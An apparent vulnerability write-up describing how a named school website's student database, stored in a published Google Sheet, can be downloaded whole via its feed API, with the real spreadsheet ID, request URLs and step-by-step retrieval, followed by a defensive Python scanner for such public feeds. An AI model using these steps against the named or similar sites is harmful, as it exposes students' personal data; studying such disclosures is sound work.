How I downloaded all the data of a website through its Google Sheets API
Summary
A website that looks up information for my school uses a Google Sheet as its database. The information on this website is stored in the sheets, and students can look up and update their information using their student ID.
Each student can only view and update their own information. If you have another student's ID, you can access and edit that person's information. But that is not the main problem.
Main Problem
I used Burp Suite to monitor the flow of data when sending requests to the server. After the search request is sent, the Google Sheets API is called to check the ID and return the data if it is valid. That would not be a problem in itself, except that I can download all the data in the Google Sheet linked through the API. I show how below.
Resource (URLs)
Browser/OS
- Chrome v74.0.3729.169
- Firefox v68.0b4
How to Exploit
URL: https://ithutech.github.io/thuctapsv/
The page calls the API to get data from the spreadsheets.google.com host. Follow the requests below as I forward them, and note the text I marked in bold.
Request 1
/feeds/list/1nO2nV65Vi3dZWGlaIOXLEc-_JWEZK16XFbjQVH_3Q0U/ouab0ad/public/values?alt=json&callback=jQuery3310417713507497116_1559012871270&_=1559012871271
Request 2
/feeds/list/1nO2nV65Vi3dZWGlaIOXLEc-_JWEZK16XFbjQVH_3Q0U/od6/public/values?alt=json&callback=jQuery3310417713507497116_1559012871268&_=1559012871269
Request 3
/feeds/list/1nO2nV65Vi3dZWGlaIOXLEc-_JWEZK16XFbjQVH_3Q0U/3/public/values?alt=json&callback=jQuery3310417713507497116_1559012871270&_=1559012871273
Request 4
/feeds/list/1nO2nV65Vi3dZWGlaIOXLEc-_JWEZK16XFbjQVH_3Q0U/Sheet3/public/values?alt=json&callback=jQuery3310417713507497116_1559012871268&_=1559012871272
Request 5
/feeds/list/1nO2nV65Vi3dZWGlaIOXLEc-_JWEZK16XFbjQVH_3Q0U/4/public/values?alt=json&callback=jQuery3310417713507497116_1559012871276&_=1559012871277
Request 6
/feeds/list/1nO2nV65Vi3dZWGlaIOXLEc-_JWEZK16XFbjQVH_3Q0U/Sheet4/public/values?alt=json&callback=jQuery3310417713507497116_1559012871274&_=1559012871275
SpreadsheetId : 1nO2nV65Vi3dZWGlaIOXLEc-_JWEZK16XFbjQVH_3Q0U
By my prediction, the bolded characters are the sheets in the database.
In Burp you can see the application map and the requests and responses more clearly.
Reading the API callback response, I found that it has a link to a file, and I guessed that this file contains the entire database of the website.
Link : https://docs.google.com/spreadsheets/d/1nO2nV65Vi3dZWGlaIOXLEc-_JWEZK16XFbjQVH_3Q0U/pubhtml
Opening the link, I can see that the database has 5 sheets, but I cannot edit or download it. It is in read-only mode.
But when I access it through the URL that calls the API, I can download it.
If I remove the string after the "?", I can download the values of that page.
Example
http://spreadsheets.google.com/feeds/list/1nO2nV65Vi3dZWGlaIOXLEc-_JWEZK16XFbjQVH_3Q0U/3/public/values
Because I saw that the database has 5 sheets, changing the value "3" to each number from 1 to 5 lets me download all the data. Change the file type to .xml and you can read it.
Do the same with the remaining URLs to download the database.
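For a site owner checking for the same exposure, the feed URL format in the requests above can be searched for in the site's own page source or proxy logs. The following is an added example, not code from the original write-up; the function name, the sample page source and the placeholder spreadsheet IDs are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Feed path layout seen in the requests above:
# /feeds/<feed>/<spreadsheetId>/<worksheet>/<visibility>/<projection>
FEED_PATH = re.compile(
    r"^/feeds/(?P<feed>[a-z]+)/(?P<sheet_id>[A-Za-z0-9_-]+)/"
    r"(?P<worksheet>[^/]+)/(?P<visibility>[a-z]+)/(?P<projection>[a-z]+)$"
)
FEED_URL = re.compile(r"https?://spreadsheets\.google\.com/[^\s\"'<>]+")


def find_public_feeds(text):
    """List each (spreadsheet, worksheet) pair the text fetches without auth."""
    findings = {}
    for url in FEED_URL.findall(text):
        parts = urlsplit(url)
        match = FEED_PATH.match(parts.path)
        # Skip incomplete feed paths and anything not marked public
        if match is None or match["visibility"] != "public":
            continue
        key = (match["sheet_id"], match["worksheet"])
        entry = findings.setdefault(
            key, {"sheet_id": key[0], "worksheet": key[1], "jsonp": False}
        )
        # A callback parameter means the response is requested as JSONP
        query = parse_qs(parts.query, keep_blank_values=True)
        entry["jsonp"] = entry["jsonp"] or "callback" in query
    return [findings[k] for k in sorted(findings)]


# Constructed sample: page source with placeholder spreadsheet IDs.
SAMPLE_SOURCE = """
<script>
var base = "https://spreadsheets.google.com/feeds/list/EXAMPLE_SHEET_ID_0001";
$.ajax({url: "https://spreadsheets.google.com/feeds/list/EXAMPLE_SHEET_ID_0001/od6/public/values?alt=json&callback=?"});
$.ajax({url: "https://spreadsheets.google.com/feeds/list/EXAMPLE_SHEET_ID_0001/3/public/values?alt=json&callback=cb1"});
$.ajax({url: "https://spreadsheets.google.com/feeds/list/EXAMPLE_SHEET_ID_0001/3/public/values"});
var admin = "https://spreadsheets.google.com/feeds/list/EXAMPLE_SHEET_ID_0002/1/private/full";
</script>
"""

if __name__ == "__main__":
    for finding in find_public_feeds(SAMPLE_SOURCE):
        print(finding)
```

Every finding is a worksheet whose full contents any visitor can read, so each one should be checked for personal data and moved behind a server-side lookup if it holds any.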